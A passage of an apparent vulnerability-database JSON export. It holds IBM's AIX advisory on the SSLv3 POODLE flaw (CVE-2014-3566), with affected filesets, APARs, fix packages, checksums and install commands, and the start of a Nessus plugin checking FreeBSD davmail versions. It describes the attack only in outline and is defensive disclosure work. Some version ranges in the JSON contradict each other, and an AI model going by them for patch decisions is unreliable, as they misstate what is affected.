"productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "aix"}, {"productVersions": ["6100-08-06", "6100-08-02", "6100-08-01", "6100-08-05", "6100-08-03", "6100-08-00", "6100-08-04"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.2.19", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.2.19", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.2.19", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.2.19", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.2.19", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.2.19", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.2.19", "productName": "aix"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "vios"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.3.48", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.3.48", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.3.48", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.3.48", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.3.48", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.3.48", "productName": "aix"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "vios"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "aix"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "vios"}], "references": [], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Wed Jun 17 09:52:06 CDT 2015\n|Updated: Tue Mar 1 10:07:14 CST 2016 \n|Update: Modified the impacted upper level fileset for 7.1.3 \n\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc\nhttps://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc\nftp://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc\n\n \nSecurity Bulletin: Vulnerability in SSLv3 affects ftpd, sendmail, imapd, \n and popd on AIX (CVE-2014-3566)\n\n\n===============================================================================\n\nSUMMARY:\n\n SSLv3 contains a vulnerability that has been referred to as the Padding\n Oracle On Downgraded Legacy Encryption (POODLE) attack. SSLv3 is enabled\n in ftpd, sendmail when using the sendmail_ssl binary, imapd, and popd on\n AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2014-3566\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n\n\n DESCRIPTION:\n\n Product could allow a remote attacker to obtain sensitive information,\n caused by a design error when using the SSLv3 protocol. A remote user\n with the ability to conduct a man-in-the-middle attack could exploit\n this vulnerability via a POODLE (Padding Oracle On Downgraded Legacy\n Encryption) attack to decrypt SSL sessions and access the plaintext\n of encrypted connections.\n\n\n CVSS:\n \n CVSS Base Score: 4.3\n CVSS Temporal Score: See \n http://xforce.iss.net/xforce/xfdb/97013 for the current score. \n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 6.1, 7.1\n VIOS 2.2.x\n\n The following fileset levels are vulnerable:\n \n AIX Fileset Lower Level Upper Level KEY\n --------------------------------------------------------\n bos.net.tcp.client 6.1.0.0 6.1.8.19 key_w_fs\n bos.net.tcp.client 6.1.0.0 6.1.9.48 key_w_fs\n bos.net.tcp.client 7.1.0.0 7.1.2.19 key_w_fs\n| bos.net.tcp.client 7.1.0.0 7.1.3.45 key_w_fs\n\n bos.net.tcp.server 6.1.0.0 6.1.8.18 key_w_fs\n bos.net.tcp.server 6.1.0.0 6.1.9.45 key_w_fs\n bos.net.tcp.server 7.1.0.0 7.1.2.18 key_w_fs\n bos.net.tcp.server 7.1.0.0 7.1.3.45 key_w_fs\n\n AIX Fileset (VIOS) Lower Level Upper Level\n ------------------------------------------------------------\n bos.net.tcp.client 6.1.0.0(2.2.0.0) 6.1.8.19(2.2.2.6)\n bos.net.tcp.client 6.1.0.0(2.2.0.0) 6.1.9.48(2.2.3.50)\n\n bos.net.tcp.server 6.1.0.0(2.2.0.0) 6.1.8.18(2.2.2.6)\n bos.net.tcp.server 6.1.0.0(2.2.0.0) 6.1.9.45(2.2.3.50)\n\n\n Note: to find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's guide.\n\n Example: lslpp -L | grep -i bos.net.tcp.client \n\n\n REMEDIATION:\n \n A. APARS\n \n IBM has assigned the following APARs to this problem:\n\n For ftpd:\n\n AIX Level APAR Availability SP KEY PRODUCT(S)\n ------------------------------------------------------------\n 6.1.8 IV69768 9/30/15 SP7 key_w_apar ftpd\n 6.1.9 IV73324 12/04/15 SP6 key_w_apar ftpd\n 7.1.2 IV73319 9/30/15 SP7 key_w_apar ftpd\n 7.1.3 IV73316 2/26/16 SP6 key_w_apar ftpd\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV69768\n http://www.ibm.com/support/docview.wss?uid=isg1IV73324\n http://www.ibm.com/support/docview.wss?uid=isg1IV73319\n http://www.ibm.com/support/docview.wss?uid=isg1IV73316\n\n For sendmail:\n Please note that these only apply to the SSL-enabled\n sendmail binary, /usr/sbin/sendmail_ssl. The default\n sendmail binary, /usr/sbin/sendmail, does not use SSL and\n is therefore not vulnerable to POODLE.\n\n AIX Level APAR Availability SP KEY PRODUCT(S)\n ------------------------------------------------------------\n 6.1.8 IV73416 9/30/15 SP7 key_w_apar sendmail\n 6.1.9 IV73417 12/04/15 SP6 key_w_apar sendmail\n 7.1.2 IV73418 9/30/15 SP7 key_w_apar sendmail\n 7.1.3 IV73419 2/26/16 SP6 key_w_apar sendmail\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV73416\n http://www.ibm.com/support/docview.wss?uid=isg1IV73417\n http://www.ibm.com/support/docview.wss?uid=isg1IV73418\n http://www.ibm.com/support/docview.wss?uid=isg1IV73419\n\n For imapd and popd:\n\n AIX Level APAR Availability SP KEY PRODUCT(S)\n ------------------------------------------------------------\n 6.1.8 IV73973 9/30/15 SP7 key_w_apar imapd/popd\n 6.1.9 IV73976 12/04/15 SP6 key_w_apar imapd/popd\n 7.1.2 IV73974 9/30/15 SP7 key_w_apar imapd/popd\n 7.1.3 IV73975 2/26/16 SP6 key_w_apar imapd/popd\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV73973\n http://www.ibm.com/support/docview.wss?uid=isg1IV73976\n http://www.ibm.com/support/docview.wss?uid=isg1IV73974\n http://www.ibm.com/support/docview.wss?uid=isg1IV73975\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. The fixes can be downloaded via ftp or\n http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/nettcp_fix.tar\n http://aix.software.ibm.com/aix/efixes/security/nettcp_fix.tar\n https://aix.software.ibm.com/aix/efixes/security/nettcp_fix.tar \n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n For ftpd:\n\n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 6.1.8.6 IV69768s6a.150515.epkg.Z key_w_fix ftpd\n 6.1.9.5 IV73324s5a.150515.epkg.Z key_w_fix ftpd\n 7.1.2.6 IV73319s6a.150515.epkg.Z key_w_fix ftpd\n 7.1.3.5 IV73316s5a.150515.epkg.Z key_w_fix ftpd\n\n VIOS Level Interim Fix (*.Z) KEY PRODUCT(S)\n -----------------------------------------------------------\n 2.2.2.6 IV69768s6a.150515.epkg.Z key_w_fix ftpd\n 2.2.3.50 IV73324s5a.150515.epkg.Z key_w_fix ftpd\n\n For sendmail:\n Please note that these only apply to the SSL-enabled\n sendmail binary, /usr/sbin/sendmail_ssl. The default\n sendmail binary, /usr/sbin/sendmail, does not use SSL and\n is therefore not vulnerable to POODLE.\n\n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 6.1.8.6 IV73416s6a.150520.epkg.Z key_w_fix sendmail\n 6.1.9.5 IV73417s5a.150520.epkg.Z key_w_fix sendmail\n 7.1.2.6 IV73418s6a.150520.epkg.Z key_w_fix sendmail\n 7.1.3.5 IV73419s5a.150520.epkg.Z key_w_fix sendmail\n\n VIOS Level Interim Fix (*.Z) KEY PRODUCT(S)\n -----------------------------------------------------------\n 2.2.2.6 IV73416s6a.150520.epkg.Z key_w_fix sendmail\n 2.2.3.50 IV73417s5a.150520.epkg.Z key_w_fix sendmail\n\n For imapd and popd:\n \n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 6.1.8.6 IV73973s6a.150609.epkg.Z key_w_fix imapd/popd\n 6.1.9.5 IV73976s5a.150609.epkg.Z key_w_fix imapd/popd\n 7.1.2.6 IV73974s6b.150610.epkg.Z key_w_fix imapd/popd\n 7.1.3.5 IV73975s5a.150619.epkg.Z key_w_fix imapd/popd\n\n VIOS Level Interim Fix (*.Z) KEY PRODUCT(S)\n -----------------------------------------------------------\n 2.2.2.6 IV73973s6a.150609.epkg.Z key_w_fix imapd/popd\n 2.2.3.50 IV73976s5a.150609.epkg.Z key_w_fix imapd/popd\n\n To extract the fixes from the tar file:\n\n tar xvf nettcp_fix.tar\n cd nettcp_fix\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the followng:\n\n For ftpd:\n \n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n e7abdef186219eb2b039cc19746a1914725b2018d6ff9558bd43df3fa18514fa IV69768s6a.150515.epkg.Z key_w_csum\n 9f608ce43a1d828d3414f9c02fc41358d0e9ae4dcbac4d7f549d7cc9b5a7afb4 IV73324s5a.150515.epkg.Z key_w_csum\n 89a73255f06eb6bffeb5884bfce3b1a3b97b1e4d477affb7b92c4c8a9196de75 IV73319s6a.150515.epkg.Z key_w_csum\n 4ad25780e666538604e490494d7c5b6c48b9ed71c72d9f54cecd749480851c59 IV73316s5a.150515.epkg.Z key_w_csum \n\n For sendmail:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 7083ce308673424836224cadf6e021df35bf461b66a262c2691c043748242ee9 IV73416s6a.150520.epkg.Z key_w_csum\n 638e54c7f0218f020370e261d4d4a68b355568dbf5119384c4a82c7d4b374832 IV73417s5a.150520.epkg.Z key_w_csum\n cd99a31c28acdc76d6a5c48b47c3c915cd7fd1c18b2cab1e356aed47fc7d2a97 IV73418s6a.150520.epkg.Z key_w_csum\n 21f0b58c4a5bebb91c7f531ec3f8a301ba45b991cf1bd27fd323926d28b269e9 IV73419s5a.150520.epkg.Z key_w_csum\n\n For imapd and popd:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 3e3e27c1b2b07b363423fba245047c6ddf2e94605d0d051e2d50b08bf74b2c23 IV73973s6a.150609.epkg.Z key_w_csum\n a4225da8f1fa4173e2a483dd656bdc2b5ac0fd8c68f4a1434eac05daeb1bdca9 IV73976s5a.150609.epkg.Z key_w_csum\n b2e11c499f66f09f3268626939b2037b3b6e949a2a80dc1f3551998a47d5815a IV73974s6b.150610.epkg.Z key_w_csum\n b2160ee3496e57cae7d66c480bd8c2b965e37b43564731fd799a335c00a7d11b IV73975s5a.150619.epkg.Z key_w_csum\n\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc.sig \n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n\n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: \n http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Wed Jun 17 09:52:06 CDT 2015\n Updated: Thu Jun 18 09:48:23 CDT 2015\n Update: Corrected vulnerable 7.1.2 upper fileset levels\n Updated: Fri Jun 19 08:27:55 CDT 2015\n Update: New iFix IV73975s5a filename and checksum. iFix rebuilt with a new,\n corrected description on install but is functionally the same.\n Updated: Fri Jun 26 15:52:00 CDT 2015\n Update: Added clarification that the sendmail fixes only apply when\n using the SSL-enabled sendmail binary, /usr/sbin/sendmail_ssl\n Updated: Wed Nov 4 11:13:43 CST 2015\n Update: Specified the VIOS fixes \n| Updated: Tue Mar 1 10:07:14 CST 2016\n| Update: Modified the impacted upper level fileset for 7.1.3\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n", "edition": 4, "reporter": "CentOS Project", "published": "2015-06-17T09:52:06", "title": "Vulnerability in SSLv3 affects AIX", "type": "aix", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "aix": {"apars": []}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2016-03-01T10:07:14", "id": "NETTCP_ADVISORY.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2018-12-20T06:16:46", "references": ["http://www.nessus.org/u?e12e2b0a", "https://sourceforge.net/p/davmail/code/2322/", "https://sourceforge.net/p/davmail/mailman/message/33279118/"], "pluginID": "83794", "description": "Mickael Guessant reports :\n\nDavMail 4.6.0 released\n\nEnhancements: Fix potential CVE-2014-3566 vulnerability.", "edition": 8, "reporter": "Tenable", "published": "2015-05-26T00:00:00", "title": "FreeBSD : davmail -- fix potential CVE-2014-3566 vulnerability (POODLE) (384fc0b2-0144-11e5-8fda-002590263bf5) (POODLE)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2018-12-19T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:davmail"], "id": "FREEBSD_PKG_384FC0B2014411E58FDA002590263BF5.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83794", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83794);\n script_version(\"2.10\");\n script_cvs_date(\"Date: 2018/12/19 13:21:18\");\n\n script_cve_id(\"CVE-2014-3566\");\n\n script_name(english:\"FreeBSD : davmail -- fix potential CVE-2014-3566 vulnerability (POODLE) (384fc0b2-0144-11e5-8fda-002590263bf5) (POODLE)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mickael Guessant reports :\n\nDavMail 4.6.0 released\n\nEnhancements: Fix potential CVE-2014-3566 vulnerability.\"\n );\n # http://sourceforge.net/p/davmail/mailman/message/33279118/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://sourceforge.net/p/davmail/mailman/message/33279118/\"\n );\n # http://sourceforge.net/p/davmail/code/2322/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://sourceforge.net/p/davmail/code/2322/\"\n );\n # https://vuxml.freebsd.org/freebsd/384fc0b2-0144-11e5-8fda-002590263bf5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e12e2b0a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:davmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate 